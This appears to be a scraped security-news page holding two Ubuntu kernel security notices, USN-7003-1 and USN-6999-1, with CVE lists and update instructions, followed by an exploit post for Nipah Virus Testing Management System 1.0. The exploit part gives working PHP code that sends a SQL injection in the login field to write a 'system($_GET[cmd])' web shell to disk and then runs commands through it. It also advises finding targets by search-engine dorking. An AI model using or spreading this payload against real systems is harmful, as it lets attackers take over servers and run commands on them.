CVE-2024-42101,CVE-2024-42104, CVE-2024-42145, CVE-2024-41097, CVE-2024-40942,CVE-2024-41034, CVE-2024-40904, CVE-2024-41089, CVE-2024-42084,CVE-2024-42093, CVE-2024-40945, CVE-2024-40958, CVE-2024-42124,CVE-2024-40987, CVE-2024-40912, CVE-2024-39506, CVE-2024-40941,CVE-2024-39509, CVE-2024-40974, CVE-2024-39505, CVE-2024-42115,CVE-2024-40988, CVE-2024-40995, CVE-2024-42097, CVE-2024-41087,CVE-2024-42106, CVE-2024-40984, CVE-2024-40981, CVE-2024-42102,CVE-2024-42148, CVE-2024-42154, CVE-2024-42096, CVE-2024-40934,CVE-2024-40980, CVE-2024-42076, CVE-2024-40943, CVE-2024-42092,CVE-2024-42089, CVE-2024-42223, CVE-2024-38619, CVE-2024-42087,CVE-2024-39469)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS  linux-image-5.4.0-1079-ibm      5.4.0-1079.84  linux-image-5.4.0-1092-bluefield  5.4.0-1092.99  linux-image-5.4.0-1099-gkeop    5.4.0-1099.103  linux-image-5.4.0-1120-kvm      5.4.0-1120.128  linux-image-5.4.0-1131-oracle   5.4.0-1131.140  linux-image-5.4.0-1132-aws      5.4.0-1132.142  linux-image-5.4.0-1136-gcp      5.4.0-1136.145  linux-image-5.4.0-1137-azure    5.4.0-1137.144  linux-image-5.4.0-195-generic   5.4.0-195.215  linux-image-5.4.0-195-generic-lpae  5.4.0-195.215  linux-image-5.4.0-195-lowlatency  5.4.0-195.215  linux-image-aws-lts-20.04       5.4.0.1132.129  linux-image-azure-lts-20.04     5.4.0.1137.131  linux-image-bluefield           5.4.0.1092.88  linux-image-gcp-lts-20.04       5.4.0.1136.138  linux-image-generic             5.4.0.195.193  linux-image-generic-lpae        5.4.0.195.193  linux-image-gkeop               5.4.0.1099.97  linux-image-gkeop-5.4           5.4.0.1099.97  linux-image-ibm-lts-20.04       5.4.0.1079.108  linux-image-kvm                 5.4.0.1120.116  linux-image-lowlatency          5.4.0.195.193  linux-image-oem                 5.4.0.195.193  linux-image-oem-osp1            5.4.0.195.193  linux-image-oracle-lts-20.04    5.4.0.1131.124  linux-image-virtual             5.4.0.195.193After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7003-1  CVE-2023-52803, CVE-2023-52887, CVE-2024-36894, CVE-2024-36974,  CVE-2024-36978, CVE-2024-37078, CVE-2024-38619, CVE-2024-39469,  CVE-2024-39487, CVE-2024-39495, CVE-2024-39499, CVE-2024-39501,  CVE-2024-39502, CVE-2024-39503, CVE-2024-39505, CVE-2024-39506,  CVE-2024-39509, CVE-2024-40901, CVE-2024-40902, CVE-2024-40904,  CVE-2024-40905, CVE-2024-40912, CVE-2024-40916, CVE-2024-40932,  CVE-2024-40934, CVE-2024-40941, CVE-2024-40942, CVE-2024-40943,  CVE-2024-40945, CVE-2024-40958, CVE-2024-40959, CVE-2024-40960,  CVE-2024-40961, CVE-2024-40963, CVE-2024-40968, CVE-2024-40974,  CVE-2024-40978, CVE-2024-40980, CVE-2024-40981, CVE-2024-40984,  CVE-2024-40987, CVE-2024-40988, CVE-2024-40995, CVE-2024-41006,  CVE-2024-41007, CVE-2024-41034, CVE-2024-41035, CVE-2024-41041,  CVE-2024-41044, CVE-2024-41046, CVE-2024-41049, CVE-2024-41087,  CVE-2024-41089, CVE-2024-41095, CVE-2024-41097, CVE-2024-42070,  CVE-2024-42076, CVE-2024-42084, CVE-2024-42086, CVE-2024-42087,  CVE-2024-42089, CVE-2024-42090, CVE-2024-42092, CVE-2024-42093,  CVE-2024-42094, CVE-2024-42096, CVE-2024-42097, CVE-2024-42101,  CVE-2024-42102, CVE-2024-42104, CVE-2024-42105, CVE-2024-42106,  CVE-2024-42115, CVE-2024-42119, CVE-2024-42124, CVE-2024-42127,  CVE-2024-42145, CVE-2024-42148, CVE-2024-42153, CVE-2024-42154,  CVE-2024-42157, CVE-2024-42223, CVE-2024-42224, CVE-2024-42232,  CVE-2024-42236Package Information:  https://launchpad.net/ubuntu/+source/linux/5.4.0-195.215  https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1132.142  https://launchpad.net/ubuntu/+source/linux-azure/5.4.0-1137.144  https://launchpad.net/ubuntu/+source/linux-bluefield/5.4.0-1092.99  https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1136.145  https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1099.103  https://launchpad.net/ubuntu/+source/linux-ibm/5.4.0-1079.84  https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1120.128  https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1131.140

Ubuntu Security Notice USN-7003-1

Ubuntu Security Notice 6999-1 - Chenyuan Yang discovered that the CEC driver driver in the Linux kernel contained a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that the JFS file system contained an out-of-bounds read vulnerability when printing xattr debug information. A local attacker could use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6999-1September 11, 2024linux, linux-aws, linux-gcp, linux-gke, linux-ibm, linux-lowlatency,linux-oem-6.8, linux-oracle vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gke: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-lowlatency: Linux low latency kernel- linux-oem-6.8: Linux kernel for OEM systems- linux-oracle: Linux kernel for Oracle Cloud systemsDetails:Chenyuan Yang discovered that the CEC driver driver in the Linux kernelcontained a use-after-free vulnerability. A local attacker could use thisto cause a denial of service (system crash) or possibly execute arbitrarycode. (CVE-2024-23848)It was discovered that the JFS file system contained an out-of-bounds readvulnerability when printing xattr debug information. A local attacker coulduse this to cause a denial of service (system crash). (CVE-2024-40902)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - ARM64 architecture;  - MIPS architecture;  - PA-RISC architecture;  - PowerPC architecture;  - RISC-V architecture;  - x86 architecture;  - Block layer subsystem;  - ACPI drivers;  - Drivers core;  - Null block device driver;  - Character device driver;  - TPM device driver;  - Clock framework and drivers;  - CPU frequency scaling framework;  - Hardware crypto device drivers;  - CXL (Compute Express Link) drivers;  - Buffer Sharing and Synchronization framework;  - DMA engine subsystem;  - EFI core;  - FPGA Framework;  - GPU drivers;  - Greybus drivers;  - HID subsystem;  - HW tracing;  - I2C subsystem;  - IIO subsystem;  - InfiniBand drivers;  - Input Device (Mouse) drivers;  - Mailbox framework;  - Media drivers;  - Microchip PCI driver;  - VMware VMCI Driver;  - Network drivers;  - PCI subsystem;  - x86 platform drivers;  - PTP clock framework;  - S/390 drivers;  - SCSI drivers;  - SoundWire subsystem;  - Sonic Silicon Backplane drivers;  - Greybus lights staging drivers;  - Thermal drivers;  - TTY drivers;  - USB subsystem;  - VFIO drivers;  - Framebuffer layer;  - Watchdog drivers;  - 9P distributed file system;  - BTRFS file system;  - File systems infrastructure;  - Ext4 file system;  - F2FS file system;  - JFS file system;  - Network file system server daemon;  - NILFS2 file system;  - NTFS3 file system;  - SMB network file system;  - Tracing file system;  - Tracing infrastructure;  - io_uring subsystem;  - Core kernel;  - BPF subsystem;  - Kernel debugger infrastructure;  - DMA mapping infrastructure;  - IRQ subsystem;  - Memory management;  - 9P file system network protocol;  - Amateur Radio drivers;  - B.A.T.M.A.N. meshing protocol;  - Ethernet bridge;  - Networking core;  - Ethtool driver;  - IPv4 networking;  - IPv6 networking;  - MAC80211 subsystem;  - Multipath TCP;  - Netfilter;  - NET/ROM layer;  - NFC subsystem;  - Network traffic control;  - Sun RPC protocol;  - TIPC protocol;  - TLS protocol;  - Unix domain sockets;  - Wireless networking;  - XFRM subsystem;  - AppArmor security module;  - Integrity Measurement Architecture(IMA) framework;  - Landlock security;  - Linux Security Modules (LSM) Framework;  - SELinux security module;  - Simplified Mandatory Access Control Kernel framework;  - ALSA framework;  - HD-audio driver;  - SOF drivers;  - KVM core;(CVE-2024-40911, CVE-2024-37356, CVE-2024-40935, CVE-2024-40944,CVE-2024-41003, CVE-2024-40990, CVE-2024-40952, CVE-2024-40940,CVE-2024-40930, CVE-2024-40985, CVE-2024-40941, CVE-2024-38630,CVE-2024-39466, CVE-2024-40933, CVE-2024-38624, CVE-2024-40924,CVE-2024-40945, CVE-2024-40899, CVE-2024-38622, CVE-2024-40979,CVE-2024-36484, CVE-2024-41004, CVE-2024-39474, CVE-2022-48772,CVE-2024-36244, CVE-2024-38664, CVE-2024-40925, CVE-2024-40980,CVE-2024-39480, CVE-2024-36270, CVE-2024-40936, CVE-2024-40904,CVE-2024-38635, CVE-2024-40927, CVE-2024-36481, CVE-2024-40929,CVE-2024-40958, CVE-2024-36978, CVE-2024-40992, CVE-2024-40908,CVE-2024-39504, CVE-2024-41001, CVE-2024-40967, CVE-2023-52884,CVE-2024-40997, CVE-2024-40903, CVE-2024-40913, CVE-2024-34030,CVE-2024-39473, CVE-2024-40966, CVE-2024-40951, CVE-2024-40902,CVE-2024-40982, CVE-2024-40923, CVE-2024-39467, CVE-2024-40910,CVE-2024-40909, CVE-2024-39463, CVE-2024-40974, CVE-2024-41002,CVE-2024-39464, CVE-2024-39496, CVE-2024-41040, CVE-2024-39469,CVE-2024-39500, CVE-2024-39510, CVE-2024-38627, CVE-2024-32936,CVE-2024-40975, CVE-2024-38390, CVE-2024-40959, CVE-2024-41006,CVE-2024-40986, CVE-2024-40987, CVE-2024-40922, CVE-2024-40983,CVE-2024-37354, CVE-2024-38637, CVE-2024-39277, CVE-2024-40943,CVE-2024-39371, CVE-2024-40921, CVE-2024-40953, CVE-2024-38634,CVE-2024-38659, CVE-2024-39492, CVE-2024-40976, CVE-2024-40906,CVE-2024-40965, CVE-2024-38667, CVE-2024-39498, CVE-2024-38628,CVE-2024-38661, CVE-2024-38663, CVE-2024-40998, CVE-2024-40948,CVE-2024-38306, CVE-2024-40928, CVE-2024-39468, CVE-2024-39494,CVE-2024-39505, CVE-2024-40963, CVE-2024-39499, CVE-2024-39506,CVE-2024-40995, CVE-2024-39491, CVE-2024-40900, CVE-2024-39478,CVE-2024-39490, CVE-2024-39291, CVE-2024-40981, CVE-2024-40926,CVE-2024-40939, CVE-2024-38385, CVE-2024-39483, CVE-2024-40989,CVE-2024-40955, CVE-2024-39501, CVE-2024-38381, CVE-2024-33621,CVE-2024-40964, CVE-2024-42148, CVE-2024-36286, CVE-2024-38629,CVE-2024-39509, CVE-2024-39298, CVE-2024-36489, CVE-2024-34777,CVE-2024-40957, CVE-2024-40919, CVE-2024-39462, CVE-2024-39495,CVE-2024-39497, CVE-2024-38636, CVE-2024-36281, CVE-2024-39479,CVE-2024-40932, CVE-2024-36288, CVE-2024-38623, CVE-2024-40969,CVE-2024-40931, CVE-2024-36971, CVE-2024-40934, CVE-2024-36015,CVE-2024-39485, CVE-2024-40996, CVE-2024-39507, CVE-2024-36973,CVE-2024-38625, CVE-2024-39301, CVE-2024-34027, CVE-2024-37026,CVE-2024-40960, CVE-2024-37078, CVE-2024-40912, CVE-2024-40988,CVE-2024-41005, CVE-2024-39276, CVE-2024-38662, CVE-2024-39502,CVE-2024-36479, CVE-2024-40947, CVE-2024-38780, CVE-2024-38388,CVE-2024-40917, CVE-2024-36974, CVE-2024-40970, CVE-2024-40901,CVE-2024-38384, CVE-2024-39475, CVE-2024-40949, CVE-2024-37021,CVE-2024-38633, CVE-2024-39503, CVE-2024-41000, CVE-2024-33847,CVE-2024-35247, CVE-2024-40968, CVE-2024-33619, CVE-2024-38619,CVE-2024-40984, CVE-2024-36478, CVE-2024-39493, CVE-2024-42078,CVE-2024-40954, CVE-2024-40978, CVE-2024-39508, CVE-2024-40915,CVE-2024-39489, CVE-2024-40920, CVE-2024-38618, CVE-2024-40938,CVE-2024-39296, CVE-2024-40962, CVE-2024-39470, CVE-2024-39481,CVE-2024-40977, CVE-2024-38621, CVE-2024-40971, CVE-2024-31076,CVE-2024-36972, CVE-2024-39471, CVE-2024-40994, CVE-2024-40973,CVE-2024-40916, CVE-2024-40942, CVE-2024-40956, CVE-2024-39465,CVE-2024-40914, CVE-2024-40937, CVE-2024-40918, CVE-2024-40905,CVE-2024-39488, CVE-2024-38632, CVE-2024-39461, CVE-2024-40999,CVE-2024-40972, CVE-2024-36477, CVE-2024-40961)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS  linux-image-6.8.0-1010-gke      6.8.0-1010.13  linux-image-6.8.0-1012-ibm      6.8.0-1012.12  linux-image-6.8.0-1012-oem      6.8.0-1012.12  linux-image-6.8.0-1012-oracle   6.8.0-1012.12  linux-image-6.8.0-1012-oracle-64k  6.8.0-1012.12  linux-image-6.8.0-1014-gcp      6.8.0-1014.16  linux-image-6.8.0-1015-aws      6.8.0-1015.16  linux-image-6.8.0-44-generic    6.8.0-44.44  linux-image-6.8.0-44-generic-64k  6.8.0-44.44  linux-image-6.8.0-44-lowlatency  6.8.0-44.44.1  linux-image-6.8.0-44-lowlatency-64k  6.8.0-44.44.1  linux-image-aws                 6.8.0-1015.16  linux-image-gcp                 6.8.0-1014.16  linux-image-generic             6.8.0-44.44  linux-image-generic-64k         6.8.0-44.44  linux-image-generic-64k-hwe-24.04  6.8.0-44.44  linux-image-generic-hwe-24.04   6.8.0-44.44  linux-image-generic-lpae        6.8.0-44.44  linux-image-gke                 6.8.0-1010.13  linux-image-ibm                 6.8.0-1012.12  linux-image-ibm-classic         6.8.0-1012.12  linux-image-ibm-lts-24.04       6.8.0-1012.12  linux-image-kvm                 6.8.0-44.44  linux-image-lowlatency          6.8.0-44.44.1  linux-image-lowlatency-64k      6.8.0-44.44.1  linux-image-oracle              6.8.0-1012.12  linux-image-oracle-64k          6.8.0-1012.12  linux-image-virtual             6.8.0-44.44  linux-image-virtual-hwe-24.04   6.8.0-44.44After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-6999-1  CVE-2022-48772, CVE-2023-52884, CVE-2024-23848, CVE-2024-31076,  CVE-2024-32936, CVE-2024-33619, CVE-2024-33621, CVE-2024-33847,  CVE-2024-34027, CVE-2024-34030, CVE-2024-34777, CVE-2024-35247,  CVE-2024-36015, CVE-2024-36244, CVE-2024-36270, CVE-2024-36281,  CVE-2024-36286, CVE-2024-36288, CVE-2024-36477, CVE-2024-36478,  CVE-2024-36479, CVE-2024-36481, CVE-2024-36484, CVE-2024-36489,  CVE-2024-36971, CVE-2024-36972, CVE-2024-36973, CVE-2024-36974,  CVE-2024-36978, CVE-2024-37021, CVE-2024-37026, CVE-2024-37078,  CVE-2024-37354, CVE-2024-37356, CVE-2024-38306, CVE-2024-38381,  CVE-2024-38384, CVE-2024-38385, CVE-2024-38388, CVE-2024-38390,  CVE-2024-38618, CVE-2024-38619, CVE-2024-38621, CVE-2024-38622,  CVE-2024-38623, CVE-2024-38624, CVE-2024-38625, CVE-2024-38627,  CVE-2024-38628, CVE-2024-38629, CVE-2024-38630, CVE-2024-38632,  CVE-2024-38633, CVE-2024-38634, CVE-2024-38635, CVE-2024-38636,  CVE-2024-38637, CVE-2024-38659, CVE-2024-38661, CVE-2024-38662,  CVE-2024-38663, CVE-2024-38664, CVE-2024-38667, CVE-2024-38780,  CVE-2024-39276, CVE-2024-39277, CVE-2024-39291, CVE-2024-39296,  CVE-2024-39298, CVE-2024-39301, CVE-2024-39371, CVE-2024-39461,  CVE-2024-39462, CVE-2024-39463, CVE-2024-39464, CVE-2024-39465,  CVE-2024-39466, CVE-2024-39467, CVE-2024-39468, CVE-2024-39469,  CVE-2024-39470, CVE-2024-39471, CVE-2024-39473, CVE-2024-39474,  CVE-2024-39475, CVE-2024-39478, CVE-2024-39479, CVE-2024-39480,  CVE-2024-39481, CVE-2024-39483, CVE-2024-39485, CVE-2024-39488,  CVE-2024-39489, CVE-2024-39490, CVE-2024-39491, CVE-2024-39492,  CVE-2024-39493, CVE-2024-39494, CVE-2024-39495, CVE-2024-39496,  CVE-2024-39497, CVE-2024-39498, CVE-2024-39499, CVE-2024-39500,  CVE-2024-39501, CVE-2024-39502, CVE-2024-39503, CVE-2024-39504,  CVE-2024-39505, CVE-2024-39506, CVE-2024-39507, CVE-2024-39508,  CVE-2024-39509, CVE-2024-39510, CVE-2024-40899, CVE-2024-40900,  CVE-2024-40901, CVE-2024-40902, CVE-2024-40903, CVE-2024-40904,  CVE-2024-40905, CVE-2024-40906, CVE-2024-40908, CVE-2024-40909,  CVE-2024-40910, CVE-2024-40911, CVE-2024-40912, CVE-2024-40913,  CVE-2024-40914, CVE-2024-40915, CVE-2024-40916, CVE-2024-40917,  CVE-2024-40918, CVE-2024-40919, CVE-2024-40920, CVE-2024-40921,  CVE-2024-40922, CVE-2024-40923, CVE-2024-40924, CVE-2024-40925,  CVE-2024-40926, CVE-2024-40927, CVE-2024-40928, CVE-2024-40929,  CVE-2024-40930, CVE-2024-40931, CVE-2024-40932, CVE-2024-40933,  CVE-2024-40934, CVE-2024-40935, CVE-2024-40936, CVE-2024-40937,  CVE-2024-40938, CVE-2024-40939, CVE-2024-40940, CVE-2024-40941,  CVE-2024-40942, CVE-2024-40943, CVE-2024-40944, CVE-2024-40945,  CVE-2024-40947, CVE-2024-40948, CVE-2024-40949, CVE-2024-40951,  CVE-2024-40952, CVE-2024-40953, CVE-2024-40954, CVE-2024-40955,  CVE-2024-40956, CVE-2024-40957, CVE-2024-40958, CVE-2024-40959,  CVE-2024-40960, CVE-2024-40961, CVE-2024-40962, CVE-2024-40963,  CVE-2024-40964, CVE-2024-40965, CVE-2024-40966, CVE-2024-40967,  CVE-2024-40968, CVE-2024-40969, CVE-2024-40970, CVE-2024-40971,  CVE-2024-40972, CVE-2024-40973, CVE-2024-40974, CVE-2024-40975,  CVE-2024-40976, CVE-2024-40977, CVE-2024-40978, CVE-2024-40979,  CVE-2024-40980, CVE-2024-40981, CVE-2024-40982, CVE-2024-40983,  CVE-2024-40984, CVE-2024-40985, CVE-2024-40986, CVE-2024-40987,  CVE-2024-40988, CVE-2024-40989, CVE-2024-40990, CVE-2024-40992,  CVE-2024-40994, CVE-2024-40995, CVE-2024-40996, CVE-2024-40997,  CVE-2024-40998, CVE-2024-40999, CVE-2024-41000, CVE-2024-41001,  CVE-2024-41002, CVE-2024-41003, CVE-2024-41004, CVE-2024-41005,  CVE-2024-41006, CVE-2024-41040, CVE-2024-42078, CVE-2024-42148Package Information:  https://launchpad.net/ubuntu/+source/linux/6.8.0-44.44  https://launchpad.net/ubuntu/+source/linux-aws/6.8.0-1015.16  https://launchpad.net/ubuntu/+source/linux-gcp/6.8.0-1014.16  https://launchpad.net/ubuntu/+source/linux-gke/6.8.0-1010.13  https://launchpad.net/ubuntu/+source/linux-ibm/6.8.0-1012.12  https://launchpad.net/ubuntu/+source/linux-lowlatency/6.8.0-44.44.1  https://launchpad.net/ubuntu/+source/linux-oem-6.8/6.8.0-1012.12  https://launchpad.net/ubuntu/+source/linux-oracle/6.8.0-1012.12

Ubuntu Security Notice USN-6999-1

Nipah Virus Testing Management System version 1.0 suffers from a php code injection vulnerability.

    =============================================================================================================================================| # Title     : Nipah virus (NiV) – Testing Management System 1.0 php code injection Vulnerability                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/nipah-virus-niv-testing-management-system-using-php-and-mysql/                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload inject php code contains a back door.[+] Line 16 + 19 Set your Target.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php[+] payload :<?php// المكتبات المطلوبةfunction send_request($url, $data) {    $options = [        'http' => [            'header'  => "Content-Type: application/x-www-form-urlencoded\r\n",            'method'  => 'POST',            'content' => http_build_query($data),        ]    ];    $context  = stream_context_create($options);    return file_get_contents($url, false, $context);}// تحديد URL ثابت$url = 'http://localhost/nipah-tms/';// مسار ثابت لرفع الملف$path = 'C:\www\nipah-tms\uploaded.php';$path = str_replace("\\", "\\\\", $path);// حمولة الباب الخلفي$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';// إرسال ملف PHP يحتوي على الباب الخلفي$payload = [    'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",    'password' => 'test',    'login' => ''];send_request($url . "/login.php", $payload);echo "[+] PHP backdoor uploaded successfully at $path\n";// تنفيذ ملف PHP المرفوع واختبار الباب الخلفي$response = file_get_contents($url . "uploaded.php?cmd=whoami");echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Tag

#google